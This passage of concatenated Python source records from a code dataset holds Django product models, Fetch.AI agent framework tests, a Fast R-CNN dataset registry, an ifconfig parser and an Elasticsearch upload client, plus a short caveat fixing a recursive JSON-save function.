'__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
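Caveat on `save_json()` in the record above: its `recursion()` only builds `'parts'` when `parent.childCount() == 0`, so it recurses on leaves (producing an empty list) and skips real children. A corrected sketch of the intended tree-to-dict walk, assuming the same `Item` API (`dict`, `childCount()`, `children()`):

```python
# Intended serialization: descend only when the item actually has children.
def to_dict(item):
    d = dict(item.dict)
    if item.childCount() > 0:
        d['parts'] = [to_dict(child) for child in item.children()]
    return d
```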
+{"seq_id":"380382263","text":"from django.db import models\n\n\nclass Section(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование раздела')\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Раздел'\n verbose_name_plural = 'Разделы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование категории')\n section = models.ForeignKey(\n Section,\n related_name='categories', on_delete=models.PROTECT, verbose_name='Раздел'\n )\n slug = models.SlugField(max_length=128, unique=True)\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=128, verbose_name='Наименование')\n category = models.ForeignKey(\n Category,\n related_name='products', on_delete=models.PROTECT, verbose_name='Категория'\n )\n slug = models.SlugField(max_length=128, unique=True)\n image = models.ImageField(upload_to='img/products/', blank=True, verbose_name='Изображение')\n description = models.CharField(max_length=256, verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Товар'\n verbose_name_plural = 'Товары'\n\n def __str__(self):\n return self.name\n\n\nclass Review(models.Model):\n product = models.ForeignKey(\n Product,\n related_name='reviews', on_delete=models.PROTECT, verbose_name='Товар'\n )\n name = models.CharField(max_length=128, verbose_name='Имя')\n content = models.TextField(verbose_name='Отзыв', default=False)\n rating = models.PositiveSmallIntegerField(verbose_name='Рейтинг')\n created = models.DateTimeField(auto_now_add=True, verbose_name='Дата и время создания')\n\n class Meta:\n verbose_name = 'Отзыв'\n verbose_name_plural = 'Отзывы'\n\n def __str__(self):\n return f'{self.name} {self.content[:30]}'\n","sub_path":"Diplom_django/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"172635861","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"This module contains the tests for aea/aea.py.\"\"\"\n\nimport os\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom threading import Thread\n\nimport pytest\n\nimport yaml\n\nfrom aea import AEA_DIR\nfrom aea.aea import AEA\nfrom aea.configurations.base import ProtocolConfig, PublicId\nfrom aea.connections.stub.connection import StubConnection\nfrom aea.crypto.fetchai import FETCHAI\nfrom aea.crypto.ledger_apis import LedgerApis\nfrom aea.crypto.wallet import Wallet\nfrom aea.identity.base import Identity\nfrom aea.mail.base import Envelope\nfrom aea.protocols.base import Protocol\nfrom aea.protocols.default.message import DefaultMessage\nfrom aea.protocols.default.serialization import DefaultSerializer\nfrom aea.registries.base import Resources\nfrom aea.skills.base import Skill\n\nfrom packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection\nfrom packages.fetchai.protocols.fipa.message import FIPAMessage\nfrom packages.fetchai.protocols.fipa.serialization import FIPASerializer\n\nfrom .conftest import (\n CUR_PATH,\n DUMMY_SKILL_PUBLIC_ID,\n LOCAL_CONNECTION_PUBLIC_ID,\n UNKNOWN_PROTOCOL_PUBLIC_ID,\n)\nfrom .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore\nfrom .data.dummy_skill.behaviours import DummyBehaviour # type: ignore\n\n\ndef test_initialise_aea():\n \"\"\"Tests the initialisation of the AEA.\"\"\"\n node = LocalNode()\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(\"my_name\", address=wallet.addresses[FETCHAI])\n connections1 = [\n OEFLocalConnection(\n identity.address, node, connection_id=OEFLocalConnection.connection_id\n )\n ]\n ledger_apis = LedgerApis({}, FETCHAI)\n my_AEA = AEA(\n identity,\n connections1,\n wallet,\n ledger_apis,\n resources=Resources(str(Path(CUR_PATH, \"aea\"))),\n )\n assert my_AEA.context == my_AEA._context, \"Cannot access the Agent's Context\"\n assert (\n not my_AEA.context.connection_status.is_connected\n ), \"AEA should not be connected.\"\n my_AEA.setup()\n assert my_AEA.resources is not None, \"Resources must not be None after setup\"\n my_AEA.resources = Resources(str(Path(CUR_PATH, \"aea\")))\n assert my_AEA.resources is not None, \"Resources must not be None after set\"\n assert (\n my_AEA.context.shared_state is not None\n ), \"Shared state must not be None after set\"\n assert my_AEA.context.task_manager is not None\n assert my_AEA.context.identity is not None, \"Identity must not be None after set.\"\n my_AEA.stop()\n\n\ndef test_act():\n \"\"\"Tests the act function of the AEA.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = 
os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connections = [\n OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n ]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n\n behaviour = agent.resources.behaviour_registry.fetch(\n (DUMMY_SKILL_PUBLIC_ID, \"dummy\")\n )\n assert behaviour.nb_act_called > 0, \"Act() wasn't called\"\n finally:\n agent.stop()\n t.join()\n\n\ndef test_react():\n \"\"\"Tests income messages.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n ledger_apis = LedgerApis({}, FETCHAI)\n connection = OEFLocalConnection(\n identity.address, node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = identity.address\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(1.0)\n agent.outbox.put(envelope)\n time.sleep(2.0)\n default_protocol_public_id = DefaultMessage.protocol_id\n dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID\n handler = agent.resources.handler_registry.fetch_by_protocol_and_skill(\n default_protocol_public_id, dummy_skill_public_id\n )\n assert handler is not None, \"Handler is not set.\"\n assert (\n msg in handler.handled_messages\n ), \"The message is not inside the handled_messages.\"\n except Exception:\n raise\n finally:\n agent.stop()\n t.join()\n\n\n@pytest.mark.asyncio\nasync def test_handle():\n \"\"\"Tests handle method of an agent.\"\"\"\n with LocalNode() as node:\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n connection = OEFLocalConnection(\n identity.address, node, connection_id=DUMMY_SKILL_PUBLIC_ID\n )\n connections = [connection]\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n msg.counterparty = agent_name\n message_bytes = DefaultSerializer().encode(msg)\n\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,\n message=message_bytes,\n )\n\n agent = AEA(\n identity, connections, wallet, ledger_apis, resources, is_programmatic=False\n )\n t = Thread(target=agent.start)\n try:\n t.start()\n time.sleep(2.0)\n 
dummy_skill = agent.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)\n dummy_handler = dummy_skill.handlers[\"dummy\"]\n\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 1\n\n # DECODING ERROR\n msg = \"hello\".encode(\"utf-8\")\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=DefaultMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 2\n\n # UNSUPPORTED SKILL\n msg = FIPASerializer().encode(\n FIPAMessage(\n performative=FIPAMessage.Performative.ACCEPT,\n message_id=0,\n dialogue_reference=(str(0), \"\"),\n target=1,\n )\n )\n envelope = Envelope(\n to=identity.address,\n sender=identity.address,\n protocol_id=FIPAMessage.protocol_id,\n message=msg,\n )\n expected_envelope = envelope\n agent.outbox.put(expected_envelope)\n time.sleep(2.0)\n assert len(dummy_handler.handled_messages) == 3\n\n finally:\n agent.stop()\n t.join()\n\n\nclass TestInitializeAEAProgrammaticallyFromResourcesDir:\n \"\"\"Test that we can initialize the agent by providing the resource object loaded from dir.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID,\n )\n cls.connections = [cls.connection]\n\n cls.resources = Resources(os.path.join(CUR_PATH, \"data\", \"dummy_aea\"))\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n cls.resources,\n is_programmatic=False,\n )\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n envelope = Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=DefaultMessage.protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n\n time.sleep(0.5)\n cls.aea.outbox.put(envelope)\n time.sleep(0.5)\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n # TODO the previous code caused an error:\n # _pickle.PicklingError: Can't pickle : import of module 'tasks' failed\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, \"dummy\")\n )\n assert 
dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n\n\nclass TestInitializeAEAProgrammaticallyBuildResources:\n \"\"\"Test that we can initialize the agent by building the resource object.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n cls.node = LocalNode()\n cls.node.start()\n cls.agent_name = \"MyAgent\"\n cls.private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n cls.wallet = Wallet({FETCHAI: cls.private_key_path})\n cls.ledger_apis = LedgerApis({}, FETCHAI)\n cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])\n cls.connection = OEFLocalConnection(\n cls.agent_name, cls.node, connection_id=LOCAL_CONNECTION_PUBLIC_ID\n )\n cls.connections = [cls.connection]\n\n cls.temp = tempfile.mkdtemp(prefix=\"test_aea_resources\")\n cls.resources = Resources(cls.temp)\n cls.aea = AEA(\n cls.identity,\n cls.connections,\n cls.wallet,\n cls.ledger_apis,\n resources=cls.resources,\n )\n\n default_protocol_id = DefaultMessage.protocol_id\n\n cls.default_protocol_configuration = ProtocolConfig.from_json(\n yaml.safe_load(open(Path(AEA_DIR, \"protocols\", \"default\", \"protocol.yaml\")))\n )\n cls.default_protocol = Protocol(\n default_protocol_id, DefaultSerializer(), cls.default_protocol_configuration\n )\n cls.resources.protocol_registry.register(\n default_protocol_id, cls.default_protocol\n )\n\n cls.error_skill = Skill.from_dir(\n Path(AEA_DIR, \"skills\", \"error\"), cls.aea.context\n )\n cls.dummy_skill = Skill.from_dir(\n Path(CUR_PATH, \"data\", \"dummy_skill\"), cls.aea.context\n )\n cls.resources.add_skill(cls.dummy_skill)\n cls.resources.add_skill(cls.error_skill)\n\n cls.expected_message = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n cls.expected_message.counterparty = cls.agent_name\n\n cls.t = Thread(target=cls.aea.start)\n cls.t.start()\n time.sleep(0.5)\n\n cls.aea.outbox.put(\n Envelope(\n to=cls.agent_name,\n sender=cls.agent_name,\n protocol_id=default_protocol_id,\n message=DefaultSerializer().encode(cls.expected_message),\n )\n )\n\n def test_initialize_aea_programmatically(self):\n \"\"\"Test that we can initialize an AEA programmatically.\"\"\"\n time.sleep(0.5)\n\n dummy_skill_id = DUMMY_SKILL_PUBLIC_ID\n dummy_behaviour_name = \"dummy\"\n dummy_behaviour = self.aea.resources.behaviour_registry.fetch(\n (dummy_skill_id, dummy_behaviour_name)\n )\n assert dummy_behaviour is not None\n assert dummy_behaviour.nb_act_called > 0\n\n dummy_task = DummyTask()\n task_id = self.aea.task_manager.enqueue_task(dummy_task)\n async_result = self.aea.task_manager.get_task_result(task_id)\n expected_dummy_task = async_result.get(2.0)\n assert expected_dummy_task.nb_execute_called > 0\n\n dummy_handler_name = \"dummy\"\n dummy_handler = self.aea.resources.handler_registry.fetch(\n (dummy_skill_id, dummy_handler_name)\n )\n dummy_handler_alt = self.aea.resources.handler_registry.fetch_by_protocol_and_skill(\n DefaultMessage.protocol_id, dummy_skill_id\n )\n assert dummy_handler == dummy_handler_alt\n assert dummy_handler is not None\n assert len(dummy_handler.handled_messages) == 1\n assert dummy_handler.handled_messages[0] == 
self.expected_message\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the test down.\"\"\"\n cls.aea.stop()\n cls.t.join()\n cls.node.stop()\n Path(cls.temp).rmdir()\n\n\nclass TestAddBehaviourDynamically:\n \"\"\"Test that we can add a behaviour dynamically.\"\"\"\n\n @classmethod\n def setup_class(cls):\n \"\"\"Set the test up.\"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n wallet = Wallet({FETCHAI: private_key_path})\n ledger_apis = LedgerApis({}, FETCHAI)\n resources = Resources(str(Path(CUR_PATH, \"data\", \"dummy_aea\")))\n identity = Identity(agent_name, address=wallet.addresses[FETCHAI])\n cls.input_file = tempfile.mkstemp()[1]\n cls.output_file = tempfile.mkstemp()[1]\n cls.agent = AEA(\n identity,\n [StubConnection(cls.input_file, cls.output_file)],\n wallet,\n ledger_apis,\n resources,\n is_programmatic=False,\n )\n\n cls.t = Thread(target=cls.agent.start)\n cls.t.start()\n time.sleep(1.0)\n\n def test_add_behaviour_dynamically(self):\n \"\"\"Test the dynamic registration of a behaviour.\"\"\"\n dummy_skill_id = PublicId(\"dummy_author\", \"dummy\", \"0.1.0\")\n dummy_skill = self.agent.resources.get_skill(dummy_skill_id)\n assert dummy_skill is not None\n new_behaviour = DummyBehaviour(\n name=\"dummy2\", skill_context=dummy_skill.skill_context\n )\n dummy_skill.skill_context.new_behaviours.put(new_behaviour)\n time.sleep(1.0)\n assert new_behaviour.nb_act_called > 0\n assert (\n len(self.agent.resources.behaviour_registry.fetch_by_skill(dummy_skill_id))\n == 2\n )\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Tear the class down.\"\"\"\n cls.agent.stop()\n cls.t.join()\n Path(cls.input_file).unlink()\n Path(cls.output_file).unlink()\n","sub_path":"tests/test_aea.py","file_name":"test_aea.py","file_ext":"py","file_size_in_byte":18486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
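Every test in the record above repeats one lifecycle pattern: start the agent in a worker thread, give its loop time to run, then stop and join in `finally` so a failed assertion cannot leak the thread. The bare pattern, independent of AEA (a hypothetical `agent` with `start()`/`stop()`):

```python
# Thread-based agent lifecycle used throughout the tests above.
import time
from threading import Thread

def run_briefly(agent, seconds=1.0):
    t = Thread(target=agent.start)
    t.start()
    try:
        time.sleep(seconds)   # let the agent's loop do some work
        # ... assertions against agent state go here ...
    finally:
        agent.stop()          # always stop, even if an assertion failed
        t.join()
```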
+{"seq_id":"515654467","text":"# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Factory method for easily getting imdbs by name.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datasets.pascal_voc import pascal_voc\nfrom datasets.coco import coco\nfrom datasets.imagenet import imagenet\nfrom datasets.vg import vg\nfrom datasets.food import food\nfrom datasets.food_data import food_merge_imdb\nfrom datasets.school_lunch import school_lunch\nfrom datasets.food_meta_data import food_meta_imdb\n\n__sets = {}\n\nfor canteen in [\"Arts\"]:\n for split in ['train', 'test']:\n name = 'food_meta_{}_{}'.format(canteen, split)\n categories = \"{}_trainval\".format(canteen)\n __sets[name] = (lambda split=split, canteen=canteen:\n food_meta_imdb(split, canteen, categories))\n\n# Set up food___\nsplits = ['train', 'val', 'trainval', 'inner', 'test']\nmt_splits = []\nfor n in [0, 10, 30, 50, 100]:\n for s in splits:\n mt_splits += [s+\"mt{}\".format(n)]\nsplits += mt_splits\n\ninnersplit = []\nfor sp in ['val', 'test']:\n for m in [10, 30, 50]:\n innersplit.append('innermt{}{}'.format(m, sp))\n\nsplits += innersplit\n\n# take few sample in inner between dataset of canteen and dataset of excl canteen as training data. And regard the lefts as validation.\ninner_few = []\nfor fewN in [0, 1, 3, 5, 10]:\n for mtN in [10]:\n for d in ['train', 'val', 'test']:\n inner_few += [\"innerfew{}mt{}{}\".format(fewN, mtN, d)]\nsplits += inner_few\n\nfor cantee in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n for split in splits:\n for category in ['exclYIH', \"All\", \"exclArts\", \"exclUTown\", \"Science\", \"exclScience\", \"exclTechChicken\", \"exclTechMixedVeg\", \"YIH\", \"Arts\", \"TechChicken\", \"TechMixedVeg\", \"UTown\", \"EconomicBeeHoon\"]:\n category_train = category + '_train'\n name = 'food_{}_{}_{}'.format(cantee, split, category_train)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_train=category_train: food_merge_imdb(split, cantee, category_train))\n for n in [10, 30, 50, 100]:\n category_mt10 = category + '_train_mt{}'.format(n)\n name = 'food_{}_{}_{}'.format(cantee, split, category_mt10)\n __sets[name] = (lambda split=split,\n cantee=cantee, category_mt10=category_mt10: food_merge_imdb(split, cantee, category_mt10))\n\n#__sets[\"Food_EconomicBeeHoon_train\"] = food_meta_imdb(train, )\n\n# Set up school lunch\nfor split in ['train', 'val', 'trainval', 'test']:\n name = 'schoollunch_{}'.format(split)\n __sets[name] = (lambda split=split: school_lunch(split))\n# Set up voc__\nfor year in ['2007', '2012']:\n for split in ['train', 'val', 'trainval', 'test']:\n name = 'voc_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: pascal_voc(split, year))\n\n# Set up coco_2014_\nfor year in ['2014']:\n for split in ['train', 'val', 'minival', 'valminusminival', 'trainval']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2014_cap_\nfor year in ['2014']:\n for split in ['train', 'val', 'capval', 'valminuscapval', 'trainval']:\n name = 
'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2015_\nfor year in ['2015']:\n for split in ['test', 'test-dev']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up vg_\n# for version in ['1600-400-20']:\n# for split in ['minitrain', 'train', 'minival', 'val', 'test']:\n# name = 'vg_{}_{}'.format(version,split)\n# __sets[name] = (lambda split=split, version=version: vg(version, split))\nfor version in ['150-50-20', '150-50-50', '500-150-80', '750-250-150', '1750-700-450', '1600-400-20']:\n for split in ['minitrain', 'smalltrain', 'train', 'minival', 'smallval', 'val', 'test']:\n name = 'vg_{}_{}'.format(version, split)\n __sets[name] = (lambda split=split,\n version=version: vg(version, split))\n\n# set up image net.\nfor split in ['train', 'val', 'val1', 'val2', 'test']:\n name = 'imagenet_{}'.format(split)\n devkit_path = 'data/imagenet/ILSVRC/devkit'\n data_path = 'data/imagenet/ILSVRC'\n __sets[name] = (lambda split=split, devkit_path=devkit_path,\n data_path=data_path: imagenet(split, devkit_path, data_path))\n\n\ndef get_imdb(name):\n \"\"\"Get an imdb (image database) by name.\"\"\"\n if name not in __sets:\n raise KeyError('Unknown dataset: {}'.format(name))\n return __sets[name]()\n\n\ndef list_imdbs():\n \"\"\"List all registered imdbs.\"\"\"\n return list(__sets.keys())\n","sub_path":"lib/datasets/factory_.py","file_name":"factory_.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
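The dataset factory above leans on a Python idiom worth spelling out: `lambda split=split, year=year: ...` freezes the loop variables as default arguments. Without the defaults, every registered lambda would close over the loop's final values. A minimal demonstration of the pitfall and the fix:

```python
# Late-binding closures vs. default-argument capture, as used in __sets.
late = [lambda: s for s in ['train', 'test']]
bound = [lambda s=s: s for s in ['train', 'test']]

print([f() for f in late])   # ['test', 'test']   late binding: both see final s
print([f() for f in bound])  # ['train', 'test']  defaults captured per iteration
```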
+{"seq_id":"181340078","text":"#encoding=utf-8\nimport re\nimport commands\ndef ifconf_dict():\n\tcomm='ifconfig'\n\tpattern=r\"\"\"([\\w]+: |inet (?:\\d{1,3}\\.){3}\\d{1,3})\"\"\"\n\t#从ifconfig的输出中可以看出网卡都是顶格写后面有一个: ip地址都是inet 开头\n\t#据此写出正则表达式\n\ts=commands.getoutput(comm)\n\t#获取ifconfig的输出\n\tout_put=re.findall(pattern,s)\n\t#正则返回的列表是[网卡,ip,网卡,ip,...]\n\tx={}\n\tfor i,j in zip(out_put[::2],out_put[1::2]):\n\t#切片并合并\n\t\tkey=i[:-2]\n\t\tval=j[5:]\n\t\tx[key]=val\n\treturn x\n","sub_path":"ifconfig_reg.py","file_name":"ifconfig_reg.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"351883943","text":"# Copyright AlertAvert.com (c) 2017. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport json\nimport os\n\nimport requests\n\nimport importxls\n\n\nclass ElasticsearchConnector(object):\n HEALTH = \"_cat/health\"\n HEADERS = {'Accept': 'application/json'}\n METADATA_DOCTYPE = \"metadata\"\n\n def __init__(self, index, doctype, host='localhost', port=9200):\n self._url = \"http://{}:{}\".format(host, port)\n self._index = index\n self._doctype = doctype\n\n def upload(self, data):\n \"\"\" Uploads the data to the Elasticsearch server.\n \n :param data: the plants' database\n :type data: list[dict]\n \n :return: None \n \"\"\"\n assert isinstance(data, list)\n\n print(\"Connecting to:\", self._url)\n res = requests.get(\"{}/{}\".format(self._url, ElasticsearchConnector.HEALTH),\n headers=ElasticsearchConnector.HEADERS)\n\n if not res.ok:\n print(\"Server unavailable\")\n return\n\n status = res.json()[0].get('status')\n print(\"Status:\", status)\n if status == 'red':\n print(\"Elasticsearch server is not in a healthy state, aborting uploads\")\n return\n\n print(\"Inserting {} items in the '{}' index\".format(len(data), self._index))\n count = 0\n for item in data:\n if 'botanical_name' not in item:\n continue\n res = requests.post(\"{}/{}/{}\".format(self._url, self._index, self._doctype),\n headers=ElasticsearchConnector.HEADERS, json=item)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n continue\n count += 1\n print(\"SUCCESS {} records uploaded\".format(count))\n\n def upload_metadata(self, upload_id, upload_metadata):\n res = requests.post(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n upload_id),\n headers=ElasticsearchConnector.HEADERS, json=upload_metadata)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n return res.ok\n\n def create_index(self):\n print(\"Creating '{}' index\".format(self._index))\n res = requests.put(\"{}/{}\".format(self._url, self._index))\n if not res.ok:\n print(\"Failed to create the index, aborting\")\n exit(1)\n\n def wipe_index(self):\n print(\"Deleting index {} from Elasticsearch server\".format(self._index))\n requests.delete(\"{}/{}\".format(self._url, self._index))\n\n def rebuild_index(self, local_path, keep=False):\n if not os.path.exists(local_path):\n print(\"File {} does not exist\".format(local_path))\n return\n self.wipe_index()\n data, stats = importxls.import_xls(local_path)\n self.upload(data)\n print(\"Data uploaded from {}\".format(local_path))\n if not keep:\n os.remove(local_path)\n print(\"Data file {} removed\".format(local_path))\n if self.upload_metadata(999, stats):\n return 999\n\n def find_one(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index, self._doctype, doc_id))\n\n def find_metadata(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n 
doc_id))\n\n def search_for(self, query):\n return requests.post(\"{}/{}/_search\".format(self._url, self._index),\n data=json.dumps(query))\n","sub_path":"elasticsearch_connector.py","file_name":"elasticsearch_connector.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
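`search_for()` above POSTs a JSON query body straight to `/_search`. A typical body for matching on the `botanical_name` field that `upload()` checks (the species string and the index/doctype names are hypothetical example values):

```python
# Example query body for ElasticsearchConnector.search_for().
query = {
    "query": {"match": {"botanical_name": "Acer palmatum"}},  # hypothetical value
    "size": 10,
}
# ElasticsearchConnector('plants', 'plant').search_for(query)  # -> requests.Response
```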
